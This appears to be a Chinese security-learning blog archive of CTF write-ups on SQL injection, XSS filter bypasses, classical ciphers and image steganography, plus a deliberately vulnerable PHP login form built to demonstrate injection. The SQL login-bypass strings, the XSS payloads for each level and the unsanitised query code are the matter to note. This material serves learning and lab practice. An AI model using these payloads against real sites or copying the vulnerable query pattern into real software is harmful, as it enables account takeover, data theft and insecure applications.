在sql语句中，=号的比较是从左向右进行比较的，那么两句话在第一个等号比较之后的结果就返回false也就是0（username数据库中不会为1，所以1换成其他字符也是一样的），接下来再和后面的’0’比较就为真返回1，同理password也是，那么SQL语句就变成了select * from user where 1 and 1。

所以用户名密码都输入1’=’0

得到flag：ctf{51d1bf8fb65a8c2406513ee8f52283e7}

SQL注入类型

上面两题都是简单的闭合注释，通过这两题了解下SQL注入是什么是干嘛的。下面写下SQL注入的类型

按照注入点类型来分类

1、数字型注入

当输入的参数为整形时，如果存在注入漏洞，可以认为是数字型注入。这一类的 SQL 语句原型大概为 select * from 表名 where id=1，测试步骤：

（1）加单引号，URL：www.xxx.com/xxx.php?id=1

对应的sql：select * from table where id=1’ 这时sql语句出错，程序无法正常从数据库中查询出数据，就会抛出异常。

（2）加and 1=1 ,URL：www.xxx.com/xxx.php?id=1 and 1=1

对应的sql：select * from table where id=3’ and 1=1 语句执行正常，与原始页面无任何差异。

（3）加and 1=2，URL：www.xxx.com/xxx.php?id=1 and 1=2

对应的sql：select * from table where id=3 and 1=2 语句可以正常执行，但是无法查询出结果，所以返回数据与原始网页存在差异。

如果满足以上三点，则可以判断该url存在数字型注入。

2、字符型注入

当输入的参数为字符串时，称为字符型。字符型和数字型最大的一个区别在于，数字型不需要单引号来闭合，而字符串一般需要通过单引号来闭合的。这一类的 SQL 语句原型大概为select * from 表名 where name=’admin’，测试步骤：

（1）加单引号：select * from table where name=’admin’’

由于加单引号后变成三个单引号，则无法执行，程序会报错；

（2）加 ’and 1=1 ：select * from table where name=’admin’ and 1=1’

也无法进行注入，还需要通过注释符号将其绕过；

Mysql 有三种常用注释符：

– 注意，这种注释符后边有一个空格

# 通过#进行注释

/ /注释掉符号内的内容

因此，构造语句为：select * from table where name =’admin’ and 1=1#’ 可成功执行返回结果正确；

（3）加and 1=2–：select * from table where name=’admin’ and 1=2 –’

则会报错

如果满足以上三点，可以判断该url为字符型注入。

3、搜索型注入点

这是一类特殊的注入类型。这类注入主要是指在进行数据搜索时没过滤搜索参数，一般在链接地址中有“keyword=关键字”，有的不显示在的链接地址里面，而是直接通过搜索框表单提交。此类注入点提交的 SQL 语句，这一类的 SQL 语句原型大概为select * from 表名 where 字段 like ‘%关键字%’，测试：

%’ union select 1,2,3,4 and ‘%’=’

按照数据提交的方式来分类

1、GET 注入

提交数据的方式是 GET , 注入点的位置在 GET 参数部分。比如有这样的一个链接http://xxx.com/news.php?id=1 , id 是注入点。

2、POST 注入

使用 POST 方式提交数据，注入点位置在 POST 数据部分，常发生在表单中。

3、Cookie 注入

HTTP 请求的时候会带上客户端的 Cookie, 注入点存在 Cookie 当中的某个字段中。

4、HTTP 头部注入

注入点在 HTTP 请求头部的某个字段中。比如存在 User-Agent 字段中。严格讲的话，Cookie 其实应该也是算头部注入的一种形式。因为在 HTTP 请求的时候，Cookie 是头部的一个字段。

按照执行效果来分类

1、基于布尔的盲注，即可以根据返回页面判断条件真假的注入。

2、基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。

3、基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中。

4、联合查询注入，可以使用union的情况下的注入。

*5、堆查询注入，可以同时执行多条语句的执行时的注入。

等等…

SQL注入基本步骤

1、判断是什么类型注入，有没有过滤关键字，是否能绕过

2、确定存在注入的表的列数以及表中数据那些字段可以显示出来

3、获取数据库版本，用户，当前连接的数据库等信息

4、获取数据库中所有表的信息

5、获取某个表的列字段信息

6、获取相应表的数据

关于SQL注入的知识还有很多很多，比如SQL注入过程需要用到的语法、函数等，这些在之后的SQL注入题目复现中遇到时会记录一下。

CRYPTO-位移编码

2019-07-18T11:37:10.000Z

概论

位移编码有凯撒密码、rot加密等（其他的加密都不确定都哪些是位移编码类型的……）

凯撒密码也属于替换加密的一种，替换加密类型有：

Atbash Cipher埃特巴什码

Caesar Cipher凯撒密码

ROT5/13/18/47

Simple Substitution Cipher简单换位密码

Hill Cipher希尔密码

Pigpen Cipher猪圈密码

Polybius Square Cipher波利比奥斯方阵密码

夏多密码（曲折加密）

Playfair Cipher普莱费尔密码

Vigenere Cipher维吉尼亚密码

Autokey Cipher自动密钥密码

Beaufort Cipher波弗特密码

Running Key Cipher滚动密钥密码

Porta Cipher门户密码

Homophonic Substitution Cipher同音替换密码

Affine Cipher仿射密码

Baconian Cipher培根密码

ADFG/VX Cipher ADFG和ADFGVX密码

Bifid Cipher双密码

Trifid Cipher三分密码

Four-Square Cipher四方密码

Checkerboard Cipher棋盘密码

不过替换加密感觉不是位移编码，这些加密方式具体概念可以百度一下都有的，这里就不写出来了。

下面主要写下凯撒密码的题目复现吧，以后见到位移编码的题再补充——

题目复现

实验吧 - 变异凯撒

题目地址：http://www.shiyanbar.com/ctf/2038

题目内容：加密密文：afZ_r9VYfScOeO_UL^RWUc 格式：flag{ }

题目是变异凯撒，所以这题就是用了凯撒加密，观察密文发现里面还有下划线和数字，说明不是简单的英文字母表的位移了，那就很可能是ASCII码表的位移了，题目上说格式是flag{ }，所以找下afz_和flag的关系，查下ASCII表

找到ASCII值：a（97）f（102）、f (102)l (108)、Z (90)a (97)、_ (95)g (103)，可以发现规律：第一个字符偏移量为5，第二个字符偏移量为6，之后偏移量依次递增。

解密可以对照ASCII码表一个字符一个字符的解，也可以用脚本。可以用Python脚本比较简单

ciphertext = 'afZ_r9VYfScOeO_UL^RWUc'
j = 5
for i in ciphertext:
    print(chr(ord(i) + j), end='')
    j += 1

得出flag为flag{Caesar_variation}

实验吧 - 我喜欢培根

题目地址：http://www.shiyanbar.com/ctf/1842

打开解题链接，可以看到这是一串摩斯密码

-- --- .-. ... . ..--.- .. ... ..--.- -.-. --- --- .-.. ..--.- -... ..- - ..--.- -... .- -.-. --- -. ..--.- .. ... ..--.- -.-. --- --- .-.. . .-. ..--.- -.. -.-. -.-. -.. -.-. -.-. -.-. -.. -.. -.. -.-. -.. -.-. -.-. -.-. -.. -.. -.-. -.-. -.-. -.-. -.-. -.-. -.-. -.-. -.-. -.. -.. -.-. -.. -.-. -.-. -.-. -.-. -.. -.-. -.-. -.-. -.-. -.-. / -.-. -.. -.-. -.-. -.-. -.. -.-. -.-. -.. -.-. / -.-. -.-. -.-. -.. -.-. -.-. -.. -.. -.. -.-. -.-. -.. -.. -.. -.-. -.-. -.. -.-. -.. -..

在线解密一下，解出

1	MORSE..--.-IS..--.-COOL..--.-BUT..--.-BACON..--.-IS..--.-COOLER..--.-DCCDCCCDDDCDCCCDDCCCCCCCCCDDCDCCCCDCCCCC/CDCCCDCCDC/CCCDCCDDDCCDDDCCDCDD

题目上说到培根而且可以看到解出来的BACON就是培根的意思，而培根所用的密码是一种本质上用二进制数设计的，
没有用通常的0和1来表示，而是采用a和b，所以替换一下

1 2	密文：DCCDCCCDDDCDCCCDDCCCCCCCCCDDCDCCCCDCCCCC/CDCCCDCCDC/CCCDCCDDDCCDDDCCDCDD 替换：baabaaabbbabaaabbaaaaaaaaabbabaaaabaaaaa/abaaabaaba/aaabaabbbaabbbaababb

培根密码表：

也可以在线解密，结果是：SHIYANBA IS COOL，所以flag为CTF{SHIYANBA IS COOL}

实验吧 - 困在栅栏里的凯撒

题目地址：http://www.shiyanbar.com/ctf/1867

题目内容是：小白发现了一段很6的字符：NlEyQd{seft}

根据题目得出是栅栏密码和凯撒密码，先栅栏解密，两个一组分解

Nl、Ey、Qd、{s、ef、t}

然后合并得NEQ{etlydsf}

再用凯撒解密，在线解密：http://www.zjslove.com/3.decode/kaisa/index.html

可以看到第12次解密就是flag了，提交时ctf要大写：CTF{tianshu}

实验吧 - 密文rot13

题目地址：http://www.shiyanbar.com/ctf/728

这题非常简单，直接把题目给的字符串在线解密一下就出来了

主要是记录一下这个加密类型，第一次见到这种加密类型，不止rot13还有rot5、rot18、rot47这四个是一样的，rot加密也是典型的位移编码的一种

ROT5、ROT13、ROT18、ROT47 编码是一种简单的码元位置顺序替换暗码。此类编码具有可逆性，可以自我解密，主要用于应对快速浏览，或者是机器的读取，而不让其理解其意

ROT5 是 rotate by 5 places 的简写，意思是旋转5个位置，其它皆同。下面分别说说它们的编码方式：
ROT5：只对数字进行编码，用当前数字往前数的第5个数字替换当前数字，例如当前为0，编码后变成5，当前为1，编码后变成6，以此类推顺序循环

ROT13：只对字母进行编码，用当前字母往前数的第13个字母替换当前字母，例如当前为A，编码后变成N，当前为B，编码后变成O，以此类推顺序循环

ROT18：这是一个异类，本来没有，它是将ROT5和ROT13组合在一起，为了好称呼，将其命名为ROT18

ROT47：对数字、字母、常用符号进行编码，按照它们的ASCII值进行位置替换，用当前字符ASCII值往前数的第47位对应字符替换当前字符，例如当前为小写字母z，编码后变成大写字母K，当前为数字0，编码后变成符号_。用于ROT47编码的字符其ASCII值范围是33－126，具体可参考ASCII编码

bugkuCTF - 简单加密

题目地址：https://ctf.bugku.com/challenges#%E7%AE%80%E5%8D%95%E5%8A%A0%E5%AF%86

题目内容是一串字符

1	e6Z9i~]8R~U~QHE{RnY{QXg~QnQ{^XVlRXlp^XI5Q6Q6SKY8jUAA

后面有一个AA，联想到base64后面有==，猜测应该是凯撒解密后再base64解密，首先查下ASCII表，A的ASCII码是65，=的ASCII码是61，往后偏移了四位，凯撒解密下得到base64字符串

1	a2V5ezY4NzQzMDAwNjUwMTczMjMwZTRhNThlZTE1M2M2OGU4fQ==

然后base64解密，flag为key{68743000650173230e4a58ee153c68e8}

bugkuCTF - 散乱的密文

题目地址：https://ctf.bugku.com/challenges#%E6%95%A3%E4%B9%B1%E7%9A%84%E5%AF%86%E6%96%87

题目内容是

lf5{ag024c483549d7fd@@1} 一张纸条上凌乱的写着2 1 6 5 3 4

2	1	6	5	3	4
l	f	5	{	a	g
0	2	4	c	4	8
3	5	4	9	d	7
f	d	@	@	1	}

按照123456顺序重新组合一下分为六组，f25d、l03f、a4d1、g87}、{c9@、544@

可以看出这是个栅栏密码，解密后是flag{52048c453d794df1}@@，flag就是flag{52048c453d794df1}

暂时先写这几题吧，之后做到这种题在更新。。。

XSS注入<二>

2019-07-14T08:11:00.000Z

xss练习平台地址：https://xss.haozi.me/

过关的条件依旧是弹窗alert（1）

这里的题基本都是反射性xss，针对过滤代码的绕过，算是专项训练吧，而且基本上都是正则表达式的过滤，做之前要熟悉正则表达式再做会简单很多，整体上不算难，可以练习下！

正则表达式视频教程：https://www.bilibili.com/video/av37494327/?p=28有4个课时，讲的很详细

0x00

1
2
3

function render (input) {
  return '' + input + '
'
}

没有任何过滤，payload：

1	<script>alert(1)script>

0x01

1
2
3

function render (input) {
  return ''</span> + input + <span class="string">''
}

多了一个< textarea>标签，那就闭合掉就行了，payload：

1	textarea><script>alert(1)script>

0x02

1
2
3

function render (input) {
  return ''">'
}

在input标签中，闭合掉标签或闭合value属性的双引号就行了，很简单，payload：

1	"><script>alert(1)script>或"onmouseover="alert(1)"

0x03

function render (input) {
  const stripBracketsRe = /[()]/g
  input = input.replace(stripBracketsRe, '')
  return input
}

可以看到过滤了圆括号被替换成了空格，但是仍然可以使用反引号执行，payload：

1	<script>alert`1`script>

0x04

function render (input) {
  const stripBracketsRe = /[()`]/g
  input = input.replace(stripBracketsRe, '')
  return input
}

这次连反引号也被过滤了，但是标签中可以直接执行实体字符，把()转成unicode，还有iframe的srcdoc属性，srcdoc里的代码会作为iframe中的内容显示出来，srcdoc中可以直接去写转译后的html片段，payload：

1	<svg><script>alert(1)script>或<iframe srcdoc="">（不过这个好像可以弹出来个1的窗口但没有过关）

0x05

function render (input) {
  input = input.replace(/-->/g, '😂')
  return ''
}

可以看到return后是个注释符，而html中有两种注释方式，分别是

1	和<!- xxx -!>

所以这题可以使用第二种注释闭合掉前面的注释符，payload：

1	--!><script>alert(1)script>

0x06

function render (input) {
  input = input.replace(/auto|on.*=|>/ig, '_')
  return `1 ${input} type="text">`
}

有个正则匹配过滤了auto，on开头以=为结尾的和>并将其换成了’_‘，且xss代码在value=1后面所以可以构造一个type为图片而图片内容alert(1)但是onerror=被过滤了，不过可以通过换行绕过正则检测，payload：

1 2	type="image" src="1" onerror ="alert(1)"

0x07

function render (input) {
  const stripTagsRe = /<\/?[^>]+>/gi
  input = input.replace(stripTagsRe, '')
  return `${input}
`
}

正则匹配过滤了尖括号 <>开头结尾的字符串并替换为空，可以通过少输入一个>来绕过正则，payload：

1	<img src="1" onerror="alert(1)"

0x08

function render (src) {
  src = src.replace(/<\/style>/ig, '/* \u574F\u4EBA */')
  return `
    
  `
}

源代码中将过滤成了后面那部分，${src}在中间，这样就可以防止闭合，但是可以加一个空格或回车来绕过正则过滤，payload：

1 2	style ><script>alert(1)script>或style ><script>alert(1)script>

0x09

function render (input) {
  let domainRe = /^https?:\/\/www\.segmentfault\.com/
  if (domainRe.test(input)) {
    return ``
  }
  return 'Invalid URL'
}

第二行正则表达式意思是匹配 https://www.segmentfault.com 开头的字符串，闭合第一个script，最后加上//注释掉后面的语句，payload：

1	https://www.segmentfault.com">script><script>alert(1)script>//

0x10

function render (input) {
  return `

  `
}

没有过滤而且是在` }

可以看到过滤了很多符号，这题需要闭合${s}前的双引号，而"被过滤为 \\" 但不影响闭合，payload：

1	");alert(1)//或");alert(1)("

`0x12`

// from alf.nu
function escape (s) {
  s = s.replace(/"/g, '\\"')
  return ''
}

直接闭合最前面的、" Onclick="alert(1) 等等

`Level 7`

欢迎来到level7

ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "没有找到和".htmlspecialchars($str)."相关的结果.
".'




';
?>

于上一关不同之处是字符都被替换成了空格还多了strtolower（）函数，所以这一关可以使用双写绕过，比如oonn，中间的on会被替换成空格，就变成了on。payload：

1	" oonnclick=alert(1)>、"><scscriptript>alert(1)scscriptript>等

`Level 8`

欢迎来到level8

ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '




';
?>

 echo '
友情链接';
?>

分析源码，这一关还是替换了很多字符，也有strtolower（）函数，而且“也被编码了，而尖括号，单引号，#、%等符号没有被过滤。看这一关后面有个添加友情链接，从源码看出需要添加链接后再点击友情链接才能弹窗，所以要用javascript绕过。而script被过滤了所以要用URL编码绕过，就是把javascript中一个字母进行编码，例r换成r ;就变成了javascr ;ipt，HTML字符实体转换：https://www.qqxiuzi.cn/bianma/zifushiti.php ，payload：

1	javascript:alert(1)

`Level 9`

 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '

'">


';
?>

if(false===strpos($str7,'http://'))
{
  echo '
友情链接';
        }
else
{
  echo '
'">友情链接';
}
?>

比上一关多了一个if-else判断句，if中有个strpos（）函数，这个函数原型是strpos（string,find,start）第一个参数string是必须的，规定了要搜索的字符串，第二个参数find是必须的，规定了要查找的字符串，第三个参数start是可选的，规定在何处开始搜索。

多的这部分就是对str7进行搜索，要找字符串 http:// ，所以if语句就是如果str7中没有要找的字符串，就执行if语句，如果找到了就会返回效应的位置比如2，就不会等于false，就可以绕过。payload：

1	javascript:alert(1)//http://

注：要用单行注释符//把后边的http：//注释掉，这里是在javascript伪协议里面，属于js范畴，所以单行注释符是可以使用的。

`Level 10`

 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "没有找到和".htmlspecialchars($str)."相关的结果.
".'

'" type="hidden">
'" type="hidden">
'" type="hidden">

';
?>

分析源码，这一关需要两个参数keyword和t_sort，尖括号<>都被转换成空，还有三个隐藏的输入框，参数t_sort就在一个hidden属性的input标签中，所以可以从隐藏的输入框入手，把type改成显示的，payload：

1	keyword=test&t_sort=" type="text" onclick="alert(1)等

`Level 11、12、13`

这三关是同样的东西，需要抓包改东西

 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "没有找到和".htmlspecialchars($str)."相关的结果.
".'

'" type="hidden">
'" type="hidden">
'" type="hidden">
'" type="hidden">

';
?>

11、12关的源码只有第13行不同，分别是

1	"t_ref" value="'.$str33.'" type="hidden">

1	"t_ua" value="'.$str33.'" type="hidden">

13关第5行变成了

1	$str11=$_COOKIE["user"];

13行是

1	"t_cook" value="'.$str33.'" type="hidden">

其他都是一样的，其中$str11=$_SERVER[‘HTTP_REFERER’];这行代码说明11、12关考察的是http头部的xss注入，13关是cookie类型的xss注入，都需要进行抓包，可以使用burpsuite来抓。

11关是改Referer，12关改User-Agent，13关改cookie，payload（三关一样）：

1	" type="text" onclick="alert(1)

11关

12关

13关

`Level 14`

这关看别人wp说的是通过修改图片的exif信息，造成解析图片exif触发XSS，利用工具推荐exiftool。但都没有这关的解析。这题跳过

`Level 15`

 
ini_set("display_errors", 0);
$str = $_GET["src"];
echo ''">';
?>

分析代码，ng-include有包含文件的意思，也就相当于php里面的include，所以可以包含第一关的页面，payload：

1	src='level1.php?name='

`Level 16`

 
ini_set("display_errors", 0);
$str =strtolower($_GET["keyword"]);
$str2=str_replace("script"," ",$str);
$str3=str_replace(" "," ",$str2);
$str4=str_replace("/"," ",$str3);
$str5=str_replace(""," ",$str4);
echo "".$str5."";
?>

分析源码，有strtolower（）函数不能大小写绕过，script、/、、都被转换成了；，这时可以用其他符号绕过，比如%0a（换行）、%0d（回车）等，payload：

1	<img%0a%0dsrc=x%0a%0donerror=alert(1)>

`Level 17、18`

17关


ini_set("display_errors", 0);
echo ".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>

18关


ini_set("display_errors", 0);
echo ".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>

这两关是一个类型，看的其他人的wp说的放了个swf在页面但不是flash xss，只要在arg02后面加上onmouseover事件就行了，payload（两关一样）：

1	arg01=a&arg02=b onmouseover=alert(1)

`Level 19、20`

这两关考察的就是flash xss了，这个现在不会还没学，找了找别人的wp这两关都没写，所以应该挺难的，不过找到了这两关的payload

19关

1	http://localhost/xss_test/level19.php?arg01=version&arg02=123

20关

1	http://localhost/xss_test/level20.php?arg01=id&arg02=\%22))}catch(e){}if(!self.a)self.a=!alert(1)//%26width%26height

参考文章：

https://www.cnblogs.com/bmjoker/p/9446472.html

https://www.jianshu.com/p/4e3a517bc4ea（他写了19关，不过我看不懂.......）



MISC-图片隐写
2019-07-12T04:17:09.000Z
题目复现：
实验吧 - 黑与白
题目地址：http://www.shiyanbar.com/ctf/1925
题目打开是一张图片，像是二维码
放入CQR中看下，发现能扫出来，是一个网站
看了别人的wp才知道网站是个培根密码……解密一下，把符号去掉大写字母换成A或B、小写字母换成B或A，然后五个一组对照表，分析得出密码为tacp。
然后把图片放在JPSH（工具下载地址：https://www.scanwith.com/JPHS_for_Windows_download.htm）中，看到需要输入密码，密码就是tacp了
然后保存为txt格式，打开就是flag了：CTF{123pcat321_Jphide}
这题是jphide隐写，jphide的理解可以参考https://www.cnblogs.com/daban/p/5680615.html
实验吧 - 黑与白2
题目地址：http://www.shiyanbar.com/ctf/1929
看题目描述说仔细看看文件，打开看到文件名是yhpargonagets，反过来刚好是steganography隐写术的英文，这个文件又是图片，所以要用到工具Image Steganography。填写图片路径（可以直接将图片拖到框里），勾选Decode和Decrypt
点开始发现需要密码
密码就要在图片中找了，打开图片可以看出图片黑白是颠倒的，用stegsolve可以进行反转，反转后
同样扫描一下得到内容：我不会拼音
这什么鬼……还是看了别人的wp才知道意思（这两题这脑洞不看别人wp我肯定是做不出来的），除了拼音常用输入法就只有五笔了，这几个字用五笔打就是密码了，我不会拼音转成五笔就是trntgiiwfcuruahujf，所以密码就是trntgiiwfcuruahujf了，输入密码得到flag：CTF{pcat_is_master}
实验吧 - 水果
题目地址：http://www.shiyanbar.com/ctf/1903
打开是一张图片
首先用Winhex打开看下，没有异常
然后放到stegsolve中查看，看下各个通道在Blue plane 0通道发现一张二维码
扫一下得到一些数字
1
45 46 45 46 32 45 32 46 46 45 46 32 46 45 46 46 32 46 46 46 32 45 46 46 46 32 46 46 45 45 46 45 32 45 46 46 46 32 46 46 46 32 46 45 46 46 32
由45、46、32这三个两位数组成，应该是ASCII码，对照ASCII码表45为“-”，46为“.”，32为空格，得到
1
-.-. - ..-. .-.. ... -... ..--.- -... ... .-..
这是个摩斯密码在线解密，结果为ctflsb bsl，最终flag为CTF{lsb_bsl}
南邮 - 丘比龙De女神
题目地址：https://cgctf.nuptsast.com/challenges#Misc
打开后是一个gif图片
题目上说隐藏了一张图片，所以binwalk一下
发现有隐藏的zip文件但只有文件尾没有头，所以用Winhex打开找到gif文件的结束地址后面的就是zip文件了，搜索3B 00（gif文件结束地址）
看到后边有个love暂时还不知道有什么用，zip文件头是50 4B 03 04刚好love对应的也是4个字节，所以替换掉然后把zip文件分离出来，打开里面有个图片但需要密码，这个密码就是love了，打开就是题上说的女神的照片了，flag是md5值，可以用kali一个命令得到md5值
或者http://tool.zhengxianjun.com/file-hash（我在这个网站试没反应......），最终flag为a6caad3aaafa11b6d5ed583bef4d8a54
南邮 - 图种
题目地址：https://cgctf.nuptsast.com/challenges#Misc
网盘提取后打开还是一个gif图片，再binwalk一下发现真的隐藏了一个zip文件而且是完整的，把它分离出来（也可直接修改后缀名为zip）
得到一个压缩包打开里面是一个gif图片，题目上说flag是动态图最后一句话的拼音首字母加上nctf{}，找到最后一帧，可以用stegsolve也可以用wps图片查看保存最后一帧
所以最终flag为nctf{dssdcmlw}
Jarvis OJ - Flag
题目地址：https://www.jarvisoj.com/challenges misc类
题目就是一张图片，保存下来
首先放在Winhex查看，格式正常末尾没有隐藏的zip文件。然后用stegsolve打开查看发现各通道没有隐藏图片，接着可以试下是否是lsb隐写，红、绿、蓝勾上0查看数据
发现50 4b 03 04这不是zip文件头吗!保存为zip格式文件（save text或save bin都可以），打开后里面是一个文件名为1的文件但没有后缀不知道是什么文件
选择记事本打开，应该是个elf文件，可以看到类似flag的东西，提交一下，正确
最终flag为hctf{dd0gf4c3tok3yb0ard4g41n~~~}
Jarvis OJ - 炫酷的战队logo
题目地址：https://www.jarvisoj.com/challenges misc类
这题下载的是个bmp图片，下载后把后缀名bmp后面的删掉。
现在这题还没做出来，因为需要先把bmp文件头不上但是我改了好长时间就是不对打不开图片，所以后面做不了了，等做出来了在补吧。参考博客：https://www.cnblogs.com/fantasquex/p/10350321.html
攻防世界 - pdf
题目地址：https://adworld.xctf.org.cn/task/answer?type=misc&number=1&grade=0&id=5100
下载附件是一个pdf文件用wps打开是一张图片
题目上说图片下面什么都没有，所以图片下面肯定有东西，刚开始我以为是要修改下图片的高会出现flag，试了下发现不是，其实是把图片删了下面就是flag
最终flag为flag{security_through_obscurity}
攻防世界 - Excaliflag
题目地址：https://adworld.xctf.org.cn/task/answer?type=misc&number=1&grade=1&id=4762
下载附件是一个png图片，首先拉进Winhex查看没有隐藏文件，然后用stegsolve打开插卡各个通道，发现一串字母，试了下果然是flag，最终flag为3DS{Gr4b_Only_th1s_B1ts}
攻防世界 - Avatar
题目地址：https://adworld.xctf.org.cn/task/answer?type=misc&number=1&grade=1&id=4903
下载附件打开是张图片，这题要用到一个工具outguess，安装和使用参考https://www.cnblogs.com/2f28/p/9740347.html
输入命令
1
outguess -r /root/lamb.jpg -t 1.txt
输入cat 1.txt可查看文件内容，即flag为We should blow up the bridge at midnight
攻防世界 - What-is-this
题目地址：https://adworld.xctf.org.cn/task/answer?type=misc&number=1&grade=1&id=4907
下载附件然后打开有两张图片，而且看起来一样但查看属性发现字节是不一样的，所以就要用到stegsolve中的Image Combiner
得出一张图片，就是flag了
最终flag为AZADI TOWER
攻防世界 - Training-Stegano-1
题目地址：https://adworld.xctf.org.cn/task/answer?type=misc&number=1&grade=1&id=4746
下载附件是一个图片，用Winhex打开直接看到flag
最终flag为steganoI
持续更新，未完待续……


最简单的sql注入
2019-04-29T13:04:39.000Z
       这里写的是最简单的sql注入，刚入门其他之后再写。首先，先理解一下sql注入，百度百科：所谓sql注入，就是通过把sql命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的sql命令。具体来说，它是利用现有应用程序，将（恶意的）sql命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入（恶意）sql语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行sql语句。当应用程序使用输入内容来构造动态sql语句以访问数据库时，就会发生sql注入攻击。
       比如做一个表单提交的页面就要连接数据库，连接数据库代码使用的就是许多sql语句，而sql注入攻击就是构造一个特殊的sql语句在不知道用户名密码的情况下直接登录。然后实验一下：
       先创建建一张数据表再添加几条记录（这里就不写了）用于测验，之后就是做一个有sql注入漏洞的web提交表单。代码：登录界面login.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

<html>
<head>
<meta charset="utf-8" />
<title>登录页面title>
<style type="text/css">
form { 
text-align: center; 
}
    style>
head>
<body>
<form method="post" action="login.php">
用户名：<input type="text" name='username' maxlength="20"/><br />
密　码：<input type="password" name='password' maxlength="18"/><br /><br />
<input type="submit" value='登录' name="submit" />
form>
body>
html>
表单数据提交到login.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

header('content-type:text/html;charset=utf-8');
error_reporting(E_ALL ^ E_NOTICE);
if ( ( $_POST['username'] != null ) && ( $_POST['password'] != null ) ) {
$userName = $_POST['username'];
$password = $_POST['password'];
$con = mysqli_connect('localhost','root','root');
if (!$con) { 
die('数据库连接失败'.$mysql_error()); 
} 
mysqli_select_db($con,"ymh");

$sql = "select * from user where username = '$userName' and password='$password'";
$res = mysqli_query($con,$sql);
$arr = mysqli_fetch_assoc($res);
if($arr)
{
header('Location: welcome.html');
}
else
{
echo"";
}
}else{
echo"";
}
?>
       这一步是web表单最重要的一步连接数据库，但也是sql漏洞所在。看上面代码是直接将提交过来的数据执行，没有进行任何防范措施，也就是这一句
1
$sql = "select * from user where username = '$userName' and password='$password'";
判断用户名密码是否正确，可以进行sql注入。
登陆成功welcome.html
1
2
3
4
5
6
7
8
9
<html>
<head>
<meta charset="UTF-8"> 
<title>欢迎登陆title> 
head>
<body>
<p>Hello Worldp>
body>
html>
先进PHPstudy中的MySQL-Front试一下，首先看正确的执行语句
然后就是用’ or 1=1#构造sql语句：
1
select * from user where username = '' or 1=1#' and password='123456'
执行一下：
       可以看到执行成功并且表中所有值都显示出来了，这是因为#是注释的意思后面都被注释掉了，这时sql语句就等价与
1
select * from user where username = '' or 1=1
那这条语句是成立的，因为1=1是恒成立的，where语句为真。所以这条sql语句又等价于
1
select * from user
这条语句就是检索user表中所有字段。
这样在web表单提交页面用户名一栏输入’ or 1=1#，密码随意输就能登陆成功了。试一下

       登陆成功，sql注入完成。可以看出来sql注入就是通过构造特殊的sql语句来进行的，所以学习sql注入首先就要熟练各种sql语句、数据库的增删改查等。


简单登录注册页面
2019-04-21T11:08:20.000Z
使用工具：PHPstudy
打开PHPstudy，进入WWW目录，我是建了3个html文件和2个php文件，分别是login.html（登录页面）、enter.php（登录后台判断）、register.html（注册页面）、register.php（注册后台判断）、welcome.html（登陆成功后欢迎界面）。第一次做web页面，很简陋……代码：
login.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

<html>
<head>
<meta charset="utf-8" />
<title>登录页面title>
<style type="text/css">
form { 
text-align: center; 
}
    style>
head>
<body>
<form method="post" action="enter.php">
用户名：<input type="text" name='username' maxlength="20"/><br />
密　码：<input type="password" name='password' maxlength="18"/><br /><br />
<input type="submit" value='登录' name="submit" />
<a href="register.html">
<input type="button" value="注册" name="button" /> 
a>
form>
body>
html>
enter.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48

header('content-type:text/html;charset=utf-8');
error_reporting(E_ALL ^ E_NOTICE);//屏蔽notice提示错误
//初次访问
if ( ( $_POST['username'] != null ) && ( $_POST['password'] != null ) ) {
$userName = $_POST['username'];
$password = $_POST['password'];
$con = mysqli_connect('localhost','root','root');//连接数据库
if (!$con) { 
die('数据库连接失败'.$mysql_error()); 
} 
mysqli_select_db($con,"ymh");//选择数据库

$sql = "select * from user where username = '{$userName}' ";
$res = mysqli_query($con,$sql);
$arr = mysqli_fetch_assoc($res);
if($arr){
if ($arr['password'] == $password)
{                 
setcookie('username',$userName,time()+3600,'/');
setcookie('password',$password,time()+3600,'/');
header('Location: welcome.html');
}
else
{
echo"";
}
}else{
echo"";
}
}else{
echo"";
}
//再次访问
if ( ($_COOKIE['username']!= null)&&($_COOKIE['password']!= null) ) {
$userName = $_COOKIE['username'];
$password = $_COOKIE['password'];
$con = mysqli_connect('localhost','root','root','ymh');
$res = mysqli_query($con,"select * from ymh where username='{$userName}'");
$row = mysqli_fetch_assoc($res);
if ($row['password'] == $password) {
header('Location: welcome.html' . "?username={$userName}");
}
else{
echo"";
}
}
?>
register.html
1
2
3
4
